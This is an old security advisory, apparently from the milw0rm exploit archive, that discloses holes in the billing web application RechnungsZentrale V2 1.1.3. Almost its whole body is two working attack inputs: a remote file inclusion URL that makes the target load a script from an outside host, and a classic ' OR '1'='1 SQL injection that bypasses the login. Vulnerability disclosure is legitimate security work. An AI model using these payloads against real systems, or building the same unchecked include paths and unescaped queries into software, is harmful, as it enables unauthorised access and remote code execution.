17 lines
614 B
Text
Executable file
17 lines
614 B
Text
Executable file
- GroundZero Security Research and Software Development 2006 -
|
|
|
|
Software: RechnungsZentrale V2
|
|
Version: 1.1.3, likely older versions are affected aswell.
|
|
Vendor: http://www.nfec.de/
|
|
|
|
Remote Inclusion:
|
|
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
|
|
|
|
SQL Injection:
|
|
User: ' OR '1'='1
|
|
Password: 1
|
|
|
|
- Bugs discovered by GroundZero Security Research and Software Development -
|
|
- http://www.GroundZero-Security.com | Http://www.g-0.org -
|
|
|
|
# milw0rm.com [2006-04-19]
|